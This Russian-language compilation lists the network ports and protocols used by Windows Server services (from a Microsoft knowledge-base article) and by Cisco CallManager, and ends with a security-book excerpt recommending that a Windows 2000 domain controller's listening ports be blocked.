Служба кластеров контролирует операции кластера серверов и управляет базой данных кластера. Кластер представляет собой набор отдельных компьютеров, которые действуют как одна система. Руководителям, программистам и пользователям кластер виден в качестве единой системы. Программное обеспечение распределяет данные между узлами кластера. В случае сбоя одного из таких узлов находящиеся в его ведении службы и данные предоставляются другими узлами. Когда восстанавливается или добавляется новый узел, программное обеспечение кластера перемещает на него часть данных.

Имя системной службы: ClusSvc

Прикладной протоколПротоколПорты
Служба кластераUDP3343
RPCTCP135
Администратор кластеровUDP137
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Обозреватель компьютеров
Системная служба обозревателя компьютеров отвечает за составление текущего списка компьютеров сети и предоставляет его запрашивающим программам. Обозреватель компьютеров используется на компьютерах под управлением операционных систем Windows для просмотра сетевых доменов и ресурсов. Компьютеры, которые выступают в роли обозревателей, составляют списки просмотра, содержащие все общие ресурсы сети. Функции просмотра необходимы таким средствам ОС Windows более ранних версий, как «Сетевое окружение», команде net view и проводнику Windows. Так, если открыть «Сетевое окружение» на компьютере под управлением Windows 95, появится список доменов и компьютеров. Для его составления компьютер получает копию списка просмотра у компьютера, который исполняет роль обозревателя.

Имя системной службы: Обозреватель

Прикладной протоколПротоколПорты
Служба датаграмм NetBIOSUDP138
Разрешение имен NetBIOSUDP137
Служба сеансов NetBIOSTCP139
Служба DHCP-сервера
Служба DHCP-сервера использует протокол DHCP (Dynamic Host Configuration Protocol) для автоматического распределения IP-адресов. С ее помощью можно настроить дополнительные сетевые параметры DHCP-клиентов, например серверы служб DNS (Domain Name System) и WINS (Windows Internet Name Service). Для хранения и передачи на клиентские компьютеры сведений о конфигурации TCP/IP можно настроить один или несколько DHCP-серверов.

Имя системной службы: DHCPServer

Прикладной протоколПротоколПорты
DHCP-серверUDP67
MADCAPUDP2535
Распределенная файловая система
Служба распределенной файловой системы (DFS) объединяет разноправные общие файловые ресурсы, которые распределены на серверах локальной (LAN) или глобальной (WAN) сети, в одном логическом пространстве имен. Служба необходима контроллерам домена Active Directory для объявления общей папки SYSVOL.

Имя системной службы: Dfs

Прикладной протоколПротоколПорты
Служба датаграмм NetBIOSUDP138
Служба сеансов NetBIOSTCP139
Сервер LDAPTCP389
Сервер LDAPUDP389
SMBTCP445
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Сервер отслеживания изменившихся связей
Служба сервера отслеживания изменившихся связей хранит сведения о перемещении файлов между томами в домене. Служба запущена на каждом контроллере домена и позволяет службе клиента отслеживания изменившихся связей отслеживать связанные документы, перемещенные на другой том с файловой системой NTFS в том же домене.

Имя системной службы: TrkSvr

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Координатор распределенных транзакций
Системная служба координатора распределенных транзакций (DTC) отвечает за координацию транзакций, распределенных в нескольких системах и диспетчерах ресурсов, например базах данных, очередях сообщений, файловых системах и других диспетчерах ресурсов с защитой транзакций. Служба DTC используется, если компоненты транзакций настраиваются через СОМ+, а также очередями сообщений (MSMQ) и в операциях SQL Server, которые охватывают несколько систем.

Имя системной службы: MSDTC

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
DNS-сервер
Служба DNS-сервера предназначена для разрешения имен DNS путем ответа на запросы на предоставление и обновление имен DNS. Серверы DNS необходимы для обнаружения устройств и служб, идентификация которых происходит по именам DNS, а также контроллеров домена в Active Directory.

Имя системной службы: DNS

Прикладной протоколПротоколПорты
DNSUDP53
DNSTCP53
Журнал событий
Системная служба журнала событий регистрирует сообщения о событиях, полученные от программ и операционной системы Windows. Отчеты службы содержат сведения, которые используются в процессе диагностики возникающих неполадок. Для просмотра отчетов служит программа «Просмотр событий». Сообщения, полученные от программ, других служб и операционной системы, регистрируются в файлах журналов событий. Такие сообщения содержат диагностические сведения, а также ошибки, которые различаются в зависимости от программы, службы или компонента, являющегося источником возникновения события. Просмотреть журналы можно средствами программирования через соответствующие интерфейсы API, а также с помощью программы «Просмотр событий» из состава консоли управления ММС.

Имя системной службы: Eventlog

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Exchange Server и клиенты Outlook
Используемые порты и протоколы зависят от версии установленного сервера Microsoft Exchange или клиента Exchange.

Клиенты Outlook подключаются к серверам Exchange более ранних версий, чем Exchange 2003, напрямую через службу RPC. Вначале происходит обращение к службе отображения конечных точек RPC (ТСР-порт 135) для получения сведений о сопоставлении портов для необходимых конечных точек. Затем клиент Outlook пытается подключиться к серверу Exchange непосредственно через эти конечные точки.

В процессе обмена данными с клиентскими компьютерами сервером Exchange 5.5 используется два порта: один для службы банка сообщений, а второй для каталога. Exchange 2000 Server и Exchange Server 2003 используют три порта: один для службы банка сообщений, второй для Directory Referral (RFR), а третий для DSProxy/NSPI.

В большинстве случаев эти порты (два или три) произвольно назначаются в диапазоне от 1024 до 65534, но при необходимости можно настроить для них статическое сопоставление номеров.

Дополнительные сведения о настройке статических портов TCP/IP в Exchange Server см. в следующей статье базы знаний Майкрософт: http://support. microsoft.com/kb/270836/ - Статическое сопоставление портов для Exchange Server (эта ссылка может указывать на содержимое полностью или частично на английском языке)
Клиенты Outlook 2003 поддерживают прямое подключение к серверам Exchange с помощью удаленного вызова процедур. Кроме того, такие клиенты могут взаимодействовать с серверами Exchange 2003 на компьютерах под управлением Windows Server 2003 в Интернете. Обмен данными между клиентом Outlook и сервером Exchange с помощью RPC по протоколу HTTP позволяет избежать необходимости открытой пересылки непроверенного RPC-трафика через Интернет. Вместо этого трафик между клиентом Outlook 2003 и компьютером Exchange Server 2003 заключается в пакеты HTTPS и передается через TCP-порт 443 (HTTPS).

В случае применения удаленного вызова процедур по протоколу HTTP необходимо, чтобы был доступен TCP-порт 443 (HTTPS) между клиентом Outlook 2003 и сервером, который выступает в качестве устройства RPCProxy. Пакеты HTTPS поступают на сервер RPCProxy, а затем пакеты RPC в развернутом виде передаются на три порта сервера Exchange подобно тому, как это происходит при прямом подключении по протоколу RPC (см. выше). Протоколу RPC по HTTP на сервере Exchange статически назначены TCP-порты 6001 (служба банка сообщений), 6002 (Directory Referral) и 6004 (DSProxy/NSPI). При обмене данными между Outlook 2003 и сервером Exchange 2003 с помощью RPC по протоколу HTTP служба отображения конечных точек не нужна, поскольку Outlook 2003 известны статически назначенные порты конечных точек. Кроме того, клиенту Outlook 2003 не требуется и доступ к глобальному каталогу, его функции выполняет интерфейс DSProxy/NSPI на сервере Exchange 2003.

Exchange Server поддерживает и другие протоколы, например SMTP, POP3 (Post Office Protocol 3) и IMAP.

Прикладной протоколПротоколПорты
IMAPTCP143
IMAP по SSLTCP993
POP3TCP110
POP3 по SSLTCP995
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
RPCTCP135
RPC по HTTPTCP443
SMTPTCP25
SMTPUDP25
Служба банка сообщенийTCP6001
Directory ReferralTCP6002
DSProxy/NSPITCP6004
Служба факсов
Служба факсов (совместимая с интерфейсом TAPI системная служба) предназначена для поддержки функций факсов. С ее помощью пользователи могут принимать и отправлять факсы из прикладных программ, используя локальные или общие сетевые устройства.

Имя системной службы: Fax

Прикладной протоколПротоколПорты
Служба сеансов NetBIOSTCP139
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
SMBTCP445
Репликация файлов
Служба репликации файлов (FRS) автоматически копирует обновления файлов и папок между компьютерами, участвующими в одном наборе репликации FRS. FRS — это стандартный модуль репликации, задачей которого является репликация общей папки SYSVOL между контроллерами домена под управлением Windows 2000 и Windows Server 2003 в составе одного домена. Кроме того, службу можно настроить на выполнение репликации файлов и папок между целевыми объектами корня или ссылки DFS с помощью средства администрирования DFS.

Имя системной службы: NtFrs

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Файловый сервер для Macintosh
Системная служба файлового сервера для Macintosh позволяет пользователям компьютеров Macintosh хранить и получать доступ к файлам на компьютерах под управлением Windows Server 2003. Если служба выключена или заблокирована, клиенты Macintosh не могут хранить и получить доступ к файлам на таком компьютере.

Имя системной службы: MacFile

Прикладной протоколПротоколПорты
Файловый сервер для MacintoshTCP548
Служба публикации FTP
Служба публикации FTP используется для установки подключений к FTP-серверам. Контрольный FTP-порт по умолчанию – 21, однако эту службу можно настроить с помощью диспетчера служб IIS. Порт данных по умолчанию (используется для FTP активного режима) автоматически устанавливается на единицу меньшим, чем контрольный порт. Таким образом, если 4131 – это контрольный порт, то 4130 будет портом данных по умолчанию. Большинство клиентов FTP используют FTP пассивного режима. Это значит, что клиент подключается к FTP-серверу через контрольный порт, FTP-сервер назначает ТСР-порт с большим номером в диапазоне от 1025 до 5000, а затем клиент открывает второе подключение к FTP-серверу для передачи данных. Диапазон портов с большими номерами можно настроить с помощью метабазы IIS.

Имя системной службы: MSFTPSVC

Прикладной протоколПротоколПорты
Управление FTPTCP21
Данные по умолчанию FTPTCP20
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Групповая политика
Для успешного применения групповой политики клиент должен иметь возможность подключения к контроллеру домена по протоколам DCOM, ICMP, LDAP, SMB и RPC. Если любой из этих протоколов недоступен или заблокирован для подключения клиента к соответствующему контроллеру домена, то политика не будет применяться или обновляться. В случае междоменного входа в систему (когда компьютер и учетная запись пользователя принадлежат разным доменам) эти протоколы могут потребоваться для обмена данными между клиентом, доменом ресурсов и доменом учетной записи пользователя. С помощью протокола ICMP определяется медленный канал. Дополнительные сведения об определении медленного канала см. в следующей статье базы знаний Майкрософт: 227260 (http://support.microsoft.com/kb/227260/) Определение медленного канала для обработки профилей пользователей и групповой политики (эта ссылка может указывать на содержимое полностью или частично на английском языке) Имя системной службы: Групповая политика
Прикладной протоколПротоколПорты
DCOMTCP + UDPпроизвольный номер порта в диапазоне 1024 – 65534
ICMP (ping)UCP20
LDAPTCP389
SMBTCP445
RPCTCP135, произвольный номер порта в диапазоне 1024 – 65534
HTTP SSL
Системная служба HTTP SSL позволяет службам IIS выполнять функции протокола SSL (SSL – это открытый стандарт, который служит для установки каналов обмена зашифрованными данными с целью предотвращения перехвата важной информации, например номеров кредитных карточек). Несмотря на то что служба предназначена для применения с другими службами Интернета, в основном она используется для проведения электронных транзакций в Интернете в зашифрованном виде. Порты ожидания для службы можно настроить с помощью диспетчера служб IIS.

Имя системной службы: HTTPFilter

Прикладной протоколПротоколПорты
HTTPSTCP443
Служба проверки подлинности в Интернете
Служба проверки подлинности в Интернете (IAS) централизованно осуществляет проверку подлинности, авторизацию, аудит и учет пользователей, которые подключаются к сети (по локальной сети или с помощью удаленных подключений). Служба IAS реализована на основе стандартного протокола RADIUS (Remote Authentication Dial-In User Service) проблемной группы IETF.

Имя системной службы: IAS

Прикладной протоколПротоколПорты
Традиционный RADIUSUDP1645
Традиционный RADIUSUDP1646
Учет RADIUSUDP1813
Проверка подлинности RADIUSUDP1812
Общий доступ к подключению Интернета (ICS)/брандмауэр подключения к Интернету (ICF)
Эта служба осуществляет преобразование сетевых адресов, адресацию и разрешение имен для всех компьютеров домашней или небольшой офисной сети. Когда установлен общий доступ к подключению Интернета, компьютер становится «шлюзом», а другие клиентские компьютеры сети могут совместно использовать одно подключение к Интернету (например, подключение удаленного доступа или широкополосное соединение). Эта служба предоставляет базовые службы DHCP и DNS, а также поддерживает полнофункциональные службы DHCP и DNS из состава Windows. Если компьютер с включенным брандмауэром ICF и общим доступом к подключению Интернета выступает в роли шлюза для остальных компьютеров сети, то он предоставляет службы DHCP и DNS для частной сети на внутреннем сетевом интерфейсе (но не на внешнем интерфейсе).

Имя системной службы: SharedAccess

Прикладной протоколПротоколПорты
DHCP-серверUDP67
DNSUDP53
DNSTCP53
Центр распространения ключей Kerberos
Если применяется системная служба центра распространения ключей Kerberos (KDC), пользователи могут входить в сеть с помощью протокола проверки подлинности Kerberos 5. Как и в других версиях протокола Kerberos, KDC – это один процесс, обеспечивающий службы проверки подлинности и выдачи билетов. Служба проверки подлинности выпускает билеты на выдачу билета, а служба выдачи билетов – билеты для подключения к компьютерам в своем домене.

Имя системной службы: kdc

Прикладной протоколПротоколПорты
Kerberos;TCP88
Kerberos;UDP88
Учет лицензий
Системная служба учета лицензий первоначально предназначалась для управления лицензиями серверных продуктов Майкрософт, которые лицензируются по модели Server CAL (Client Access License, клиентская лицензия на доступ). Учет лицензий был введен в Microsoft Windows NT Server 3.51. По умолчанию служба учета лицензий в Windows Server 2003 отключена. Из-за изменяющихся условий лицензирования, а также ограничений в исходной архитектуре служба учета лицензий не всегда составляет точную картину общего числа приобретенных лицензий CAL в сравнении с общим числом лицензий CAL, которые используются на определенном сервере или предприятии. Отчет службы учета лицензий может противоречить условиям лицензионных соглашений и правам на использование продукта. Служба учета лицензий будет исключена из будущих версий операционных систем Windows. Корпорация Майкрософт рекомендует включать эту службу только пользователям операционных систем семейства Microsoft Small Business Server.

Имя системной службы: LicenseService

Прикладной протоколПротоколПорты
Служба датаграмм NetBIOSUDP138
Служба сеансов NetBIOSTCP139
SMBTCP445
Очередь сообщений
Системная служба очереди сообщений представляет собой инфраструктуру и средство разработки распределенных программ для обмена сообщениями в Windows. Такие программы способны осуществлять обмен данными между неоднородными сетями и отправлять сообщения между компьютерами, которые временно не могут установить подключение друг к другу. Служба очереди сообщений обеспечивает безопасность, эффективную маршрутизацию, поддержку отправки сообщений внутри транзакций, приоритетную отправку, а также гарантированную доставку сообщений.

Имя системной службы: MSMQ

Прикладной протоколПротоколПорты
MSMQTCP1801
MSMQUDP1801
MSMQ-DCsTCP2101
MSMQ-MgmtTCP2107
MSMQ-PingUDP3527
MSMQ-RPCTCP2105
MSMQ-RPCTCP2103
RPCTCP135
Служба сообщений
Системная служба сообщений принимает и отправляет сообщения пользователей, компьютеров, администраторов и службы оповещения. Эта служба не имеет отношения к программе Windows Messenger. Если отключить службу сообщений, зарегистрировавшиеся на данный момент времени в сети компьютеры и пользователи не будут получать отправленных им уведомлений. Кроме того, перестают функционировать команды net send и net name.

Имя системной службы: Messenger

Прикладной протоколПротоколПорты
Служба датаграмм NetBIOSUDP138
Стеки пересылки сообщений Microsoft Exchange
В Exchange 2000 Server и Exchange Server 2003 агент пересылки сообщений (MTA) часто используется для обеспечения обратно-совместимых служб пересылки сообщений между серверами Exchange 2000 Server и Exchange Server 5.5 в смешанной среде.

Имя системной службы: MSExchangeMTA

Прикладной протоколПротоколПорты
X.400TCP102
Microsoft Operations Manager 2000
Приложение Microsoft Operations Manager (MOM) 2000 позволяет управлять операциями на уровне предприятия, включая всестороннее управление событиями, активный мониторинг, отправку оповещений, составление отчетов и анализ тенденций развития. После установки пакета обновлений 1 (SP1) приложение MOM 2000 прекращает обмен данными в формате обычного текста, а весь трафик между агентом и сервером MOM шифруется через TCP-порт 1270. Для подключения к серверу консоль администратора MOM использует модель DCOM, т. е. администратор, осуществляющий управление сервером МОМ по сети, должен иметь доступ к произвольно назначенным ТСР-портам с большими номерами.

Имя системной службы: one point

Прикладной протоколПротоколПорты
MOM-ClearTCP51515
MOM-EncryptedTCP1270
Служба Microsoft POP3
Служба Microsoft POP3 предназначена для обмена сообщениями электронной почты, а также их поиска. Служба может использоваться для хранения и управления учетными записями электронной почты на почтовом сервере. Когда на почтовом сервере установлена служба Microsoft POP3, пользователи создают подключение, а затем производят поиск сообщений с помощью почтового клиента с поддержкой протокола РОР3, например Microsoft Outlook.

Имя системной службы: POP3SVC

Прикладной протоколПротоколПорты
POP3TCP110
MSSQLSERVER
MSSQLSERVER – это системная служба из состава Microsoft SQL Server 2000. Сервер SQL Server представляет собой мощную, комплексную платформу управления данными. Порты, которые используются каждым экземпляром SQL Server, настраиваются с помощью средства Server Network Utility.

Имя системной службы: MSSQLSERVER

Прикладной протоколПротоколПорты
SQL по TCPTCP 1433
SQL ProbeUDP1434
MSSQL$UDDI
Системная служба MSSQL$UDDI устанавливается одновременно с функцией UDDI (Universal Description, Discovery and Integration) операционных систем семейства Windows Server 2003 и служит для поддержки этой функции в рамках предприятия. Ключевым компонентом службы MSSQL$UDDI является модуль базы данных SQL Server.

Имя системной службы: MSSQLSERVER

Прикладной протоколПротоколПорты
SQL по TCPTCP1433
SQL ProbeUDP1434
Net Logon
Для проверки подлинности пользователей и служб системная служба Net Logon поддерживает безопасный канал между компьютером и контроллером домена. Она передает на контроллер домена учетные данные пользователя, а возвращает доменные идентификаторы безопасности и назначенные пользователю права. Обычно этот процесс называется сквозной проверкой подлинности. Служба Net Logon автоматически запускается, только когда к домену подключается рядовой компьютер или контроллер домена. В операционных системах семейств Windows 2000 Server и Windows Server 2003 служба Net Logon публикует записи ресурсов в базе данных DNS. В процессе ожидания входящих запросов служба зависит от служб локального администратора безопасности и сервера. На компьютерах в составе домена служба Net Logon использует удаленный вызов процедур по именованным каналам. На контроллерах домена используются удаленный вызов процедур по именованным каналам, удаленный вызов процедур по протоколу TCP/IP, слоты сообщений и Облегченный протокол доступа к каталогам (LDAP).

Имя системной службы: Netlogon

Прикладной протоколПротоколПорты
Служба датаграмм NetBIOSUDP138
Разрешение имен NetBIOSUDP137
Служба сеансов NetBIOSTCP139
SMBTCP445
Общий доступ к рабочему столу NetMeeting
Системная служба общего доступа к рабочему столу NetMeeting позволяет прошедшим проверку пользователям удаленно управлять рабочим столом Windows с помощью программы Windows NetMeeting с другого компьютера по внутренней сети предприятия. Службу необходимо явно включить в NetMeeting, а для отключения или закрытия предназначен значок в области уведомлений Windows.

Имя системной службы: mnmsrvc

Прикладной протоколПротоколПорты
Службы терминаловTCP3389
Протокол NNTP (Network News Transfer Protocol)
Системная служба протокола NNTP позволяет компьютерам под управлением Windows Server 2003 выступать в роли сервера новостей. Для загрузки групп новостей с сервера, просмотра заголовков и чтения статей в каждой группе используется программа новостей, например Microsoft Outlook Express.

Имя системной службы: NNTPSVC

Прикладной протоколПротоколПорты
NNTPTCP119
NNTP по SSLTCP563
Журналы и оповещения производительности
Системная служба журналов и оповещений производительности по заранее определенному графику собирает данные о производительности на локальном и удаленных компьютерах, а затем заносит их в журнал или использует для создания сообщения. В зависимости от значения параметра сбора именованных журналов служба запускает или останавливает каждый именованный сбор данных о производительности. Служба запускается только в том случае, если запланирован хотя бы один сбор данных о производительности.

Имя системной службы: SysmonLog

Прикладной протоколПротоколПорты
Служба сеансов NetBIOSTCP139
Диспетчер печати
Системная служба диспетчера печати управляет всеми локальными и сетевыми очередями печати, а также контролирует все задания печати. Диспетчер печати является ключевым компонентом системы печати в Windows. Он управляет очередями печати в системе, а также взаимодействует с драйверами принтеров и компонентами ввода-вывода, например USB-портами и протоколами семейства TCP/IP.

Имя системной службы: Spooler

Прикладной протоколПротоколПорты
Служба сеансов NetBIOSTCP139
SMBTCP445
Удаленная установка
Системная служба удаленной установки используется для установки Windows 2000, Windows XP и Windows Server 2003 на клиентских компьютерах с PXE (Pre-Boot eXecution Environment), которые поддерживают удаленную загрузку. Основной компонент сервера удаленной установки (RIS) – служба уровня согласования информации загрузки (Boot Information Negotiation Layer, BINL) – отвечает на запросы клиентов РХЕ, проверяет по Active Directory подлинность клиентов, а также осуществляет обмен данными между клиентом и сервером. Служба BINL устанавливается, когда с помощью средства «Установка компонентов Windows» добавляется сервер RIS, а также может быть выбрана в процессе исходной установки операционной системы.

Имя системной службы: BINLSVC

Прикладной протоколПротоколПорты
BINLUDP4011
Удаленный вызов процедур (RPC)
Системная служба удаленного вызова процедур (RPC) представляет собой механизм взаимодействия между процессами (IPC), который позволяет осуществлять обмен данными и вызывать функции из других процессов. Другой процесс может быть запущен на локальном компьютере, в локальной сети или на удаленном компьютере; для получения доступа к нему используется подключение по глобальной (WAN) или виртуальной частной (VPN) сети. Служба RPC выступает в роли службы отображения конечных точек RPC и диспетчера служб СОМ (Component Object Model). Служба удаленного вызова процедур необходима для запуска многих других служб.

Имя системной службы: RpcSs

Прикладной протоколПротоколПорты
RPCTCP135
RPC по HTTPTCP593
Локатор удаленного вызова процедур (RPC)
Системная служба локатора удаленного вызова процедур управляет базой данных службы имен RPC. Служба должна быть включена, чтобы клиенты RPC могли находить серверы RPC. По умолчанию служба выключена.

Имя системной службы: RpcLocator

Прикладной протоколПротоколПорты
Служба сеансов NetBIOSTCP139
SMBTCP445
Уведомления внешнего хранилища
Системная служба уведомлений внешнего хранилища отправляет уведомление пользователю, когда он осуществляет чтение или запись файла, который доступен только на дополнительном накопителе. Если служба остановлена, отправка уведомлений прекращается.

Имя системной службы: Remote_Storage_User_Link

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534
Сервер внешнего хранилища
Системная служба сервера внешнего хранилища хранит редко используемые файлы на дополнительном накопителе. Если служба остановлена, переместить или извлечь файлы, которые расположены на дополнительном накопителе, невозможно.

Имя системной службы: Remote_Storage_Server

Прикладной протоколПротоколПорты
RPCTCP135
Произвольно назначенные ТСР-порты с большими номерамиTCPпроизвольный номер порта в диапазоне 1024 – 65534

Продолжение следует. ..

Источник - http://support.microsoft.com/kb/832017/ru


Авторизуйтесь для добавления комментариев!

Порты TCP и UDP, используемые Cisco CallManager

Протокол

Удаленный исходящий порт

Порт назначения CallManager

Исходящий порт CallManager

Порт назначения удаленного устройства

Удаленные устройства

Примечания

DTC

   

TCP 135

 

Устройства CallManager в одном кластере

 

SSH

 

TCP 22

   

Клиент Secure Shell

 

Telnet

 

TCP 23

   

Клиент Telnet

 

DNS

 

UDP 53

   

Серверы DNS

 

DHCP

UDP 68

UDP 67

   

Сервер DHCP

 

DHCP

   

UDP 68

UDP 67

Клиент DHCP

 

TFTP

 

UDP 69

     

Динамические порты, используемые после первого подключения

HTTP

 

TCP 80

   

Веб-браузеры администратора / пользователя

Страницы CCMAdmin и CCMUser

OSI (DAP, DSP, DISP)

 

TCP или UDP 120

   

Каталог DCD

 

NTP

 

UDP 123

       

WINS

 

UDP 137-139

   

Сервер WINS

Служба имен Интернет для Windows

SNMP

 

UDP 161

       

Сообщение SNMP

     

UDP 162

   

LDAP

 

TCP 389

 

TCP 389

Службы каталога

При интегрировании с Corporate Directory

HTTPS / SSL

 

TCP 443

       

SMB

 

TCP 445

 

TCP 445

Несколько CallManager в одном кластере

 

Syslog

 

TCP 514

 

UDP 514

Служба системного журнала

 

RMI

 

TCP 1099-1129

   

Служба RMI. Консоль оператора

 

MS SQL

 

TCP 1433

 

TCP 1433

Несколько CallManager в одном кластере

 

H.323 RAS

     

UDP 1718

Обнаружение Привратника

 

H. 323 RAS

     

UDP 1719

Привратник RAS

CallManager до версии 3.3. Cisco Conference Connection

H.323 RAS

   

UDP 1024-4999

UDP 1719

Привратник RAS

CallManager версии 3. 3

H.323 H.225

 

TCP 1720

 

TCP 1720

Шлюзы H.323 / анонимное устройство Cisco Conference Connection / неуправляемая Привратником магистраль H.323

 

H.323 H.225/ICT

 

TCP 1024-4999

   

Магистрали H. 323, управляемые Привратником CallManager

CallManager версии 3.3

H.323 H.245

 

TCP 1024-4999

TCP 1024-4999

 

Шлюзы H.323 CallManager / анонимное устройство / магистрали H.323

 

H.323 H.245

 

TCP 11000-65535

   

Шлюзы IOS H. 323 Cisco Conference Connection

 

SCCP

 

TCP 2000

   

Skinny-клиенты (IP-телефоны)

 

Skinny-шлюз (аналоговый)

 

TCP 2001

   

Аналоговый Skinny-шлюз

Устарело

Skinny-шлюз (цифровой)

 

TCP 2002

   

Цифровой Skinny-шлюз

Устарело

Управление MGCP

 

UDP 2427

   

Управление шлюзом MGCP

 

Соединение с MGCP

 

TCP 2428

   

Соединение со шлюзами MGCP

 

RTS Serv

   

2500

     

Cisco Extended Service

 

TCP 2551

   

Определение активного / резервного

 

Cisco Extended Service

 

TCP 2552

   

Уведомление об изменении DB

 

Сборщик данных RIS

 

TCP 2555

   

Связь между RIS

 

Сборщик данных RIS

 

TCP 2556

   

Используется клиентами (IIS) для связи с RIS

 

CTI/QBE

 

TCP 2748

   

Приложения TAPI/JTAPI

Подключается к CTI Manager. Используется приложениями IVR, CCC, PA, Cisco Softphone, CRS, ICD, IPCC, IPMA, Attendant Console и любыми другими, которые используют TAPI или плагин J/TAPI / TSP.

Служба IPMA

 

TCP 2912

   

Консоль помощника IPMA

 

Приложение потоковой передачи медиаинформации

 

UDP 3001

   

Уведомление об изменении

 

SCCP

 

TCP 3224

   

Медиаресурсы

Мосты для конференций / Xcoder

Терминальные службы MS

 

TCP 3389

   

Терминальные службы Windows

 

Агент HID Entercept

     

TCP 5000

Консоль обнаружения несанкционированного доступа к хосту

 

CallManager SIP

 

TCP/UDP 5060

 

TCP 5060

Порт по умолчанию магистрали SIP

Может использовать TCP 1024 - 65535

Помощник VNC http

 

TCP 580x

     

Удаленное управление

VNC Display

 

TCP 690x

   

Дисплей компьютера виртуальной сети

Удаленное управление

Уведомление об изменениях CallManager

 

TCP 7727

   

Уведомление об изменении CallManager. Монитор уровня базы данных Cisco, Cisco TFTP, Cisco IP поток медиаданных, Cisco TCD, Cisco MOH

Уведомление об изменении RealTime

Служба IPMA

 

TCP 8001

   

IP Manager Assistant

Уведомление об изменении

ICCS

 

TCP 8002

 

TCP 8002

Несколько CallManager в одном кластере

Внутрикластерная связь

CTIM

 

TCP 8003

       

Cisco Tomcat

 

TCP 8007

   

Веб-запросы

 

Cisco Tomcat

 

TCP 8009

   

Веб-запросы

 

Cisco Tomcat

 

TCP 8111

   

IIS, веб-запросы рабочего потока IPMA

 

Cisco Tomcat

 

TCP 8222

   

IIS, веб-запросы рабочего потока приложения EM

 

Cisco Tomcat

 

TCP 8333

   

IIS, веб-запросы рабочего потока приложения WebDialer

 

DC Directory

 

TCP 8404

   

Встроенные службы каталога

Используется для служб каталога. Аутентификация / настройка приложения. Журнал SoftPhone. Журнал пользователя.

Cisco Tomcat

 

TCP 8444

   

IIS, веб-запросы рабочего потока службы EM

 

Cisco Tomcat

 

TCP 8555

   

IIS, веб-запросы рабочего потока Apache SOAP

 

Cisco Tomcat

 

TCP 8998

   

Веб-запросы

 

Cisco Tomcat

 

TCP 9007

   

IIS, веб-запросы рабочего потока CAR

 

RTP

UDP 16384-32767

   

UDP 16384-32767

Голосовое медиа

IP IVR Media. CCC IVR Media, Cisco SoftPhone, приложение Media Streaming

Агент Cisco SNMP

 

UDP 61441

   

Интерфейс аварийных сигналов Cisco

Принимает некоторые аварийные сигналы SNMP в формате XML.

Иллюстрированный самоучитель по защите в Интернет › Уязвимость Windows 2000 › Сканирование [страница - 135] | Самоучители по безопасности

Сканирование

Операционная система Windows 2000 прослушивает список портов, многие из которых не были задействованы в Windows NT 4 и появились лишь в этой версии операционной системы. В табл. 6.1 приводится список некоторых портов, прослушиваемых по умолчанию контроллером домена Windows 2000. Каждый из них является потенциальной точкой входа в систему.

Список номеров портов TCP и UDP, используемых службами и программами компании Microsoft, можно найти в перечне ресурсов по адресу http://www.microsoft.com/windows2000/library/resouces/reslcit/samplechapters/default.asp.

Таблица 6.1. Список портов, прослушиваемых по умолчанию контроллером домена Windows 2000.

Порт Служба
TCP 25 SMTP
TCP 21 FTP
TCP/UDP 53 DNS
TCP 80 WWW
TCP/UDP 88 Kerberos
TCP 135 RPC/DCE Endpoint mapper
UDP 137 Служба имен NetBIOS
UDP 138 Служба дейтаграмм NetBIOS
TCP 139 Служба сеансов NetBIOS
TCP/UDP 389 LDAP
TCP 443 HTTP поверх SSl/TLS
TCP/UDP 445 Microsoft SMB/CIFS
TCP/UDP 464 Kerberos kpasswd
UDP 500 IKE (Internet Key Exchange) (согласно протоколу IPSec)
TCP 593 HTTP RPC Endpoint mapper
TCP 636 LDAP поверх SSLДLS
TCP 3268 Глобальный каталог службы активных каталогов
TCP 3269 Глобальный каталог службы активных каталогов поверх SSL
TCP 3389 Терминальный сервер Windows

Контрмеры: отключение служб и блокировка портов

Наилучший способ предотвращения всевозможных атак – это блокировка доступа к этим службам как на уровне сети, так и на уровне отдельных компьютеров.

Внешние устройства контроля доступа к сети (переключатели, маршрутизаторы, брандмауэры и т.д.) нужно сконфигурировать таким образом, чтобы пресечь любые попытки доступа извне ко всем указанным портам, (Обычно это делается следующим образом. Отключаются все протоколы для всех доменов, а затем подключаются только некоторые службы для избранных доменов.) При этом, конечно, необходимо помнить об очевидных исключениях: порт 80 или 443 нужно оставить для работы Web-серверов. Ни один из этих портов не должен быть доступен за пределами сети, и лишь некоторые могут предоставляться для использования проверенными пользователями внутренних подсетей. Особенно это касается контроллера домена. На это есть две причины.

  • В главе 3 было показано, как можно подключиться к портам TCP 389 и TCP 3268 через службу LDAP и глобальный каталог соответственно и получить данные с сервера.
  • Как отмечалось в главе 3, служба сеансов NetBIOS Session Service, работающая через порт TCP 139, является одним из источников утечки информации и потенциального взлома сети под управлением Windows NT. Большинство действий, описанных в главе 5, выполняется исключительно через соединения по протоколу NetBIOS. Данные операционной системы Windows 2000 могут также быть получены через порт TCP 445.

He забудьте прочитать раздел " Отключение служб NetBIOS/SMB в Windows 2000" ниже в этой главе.

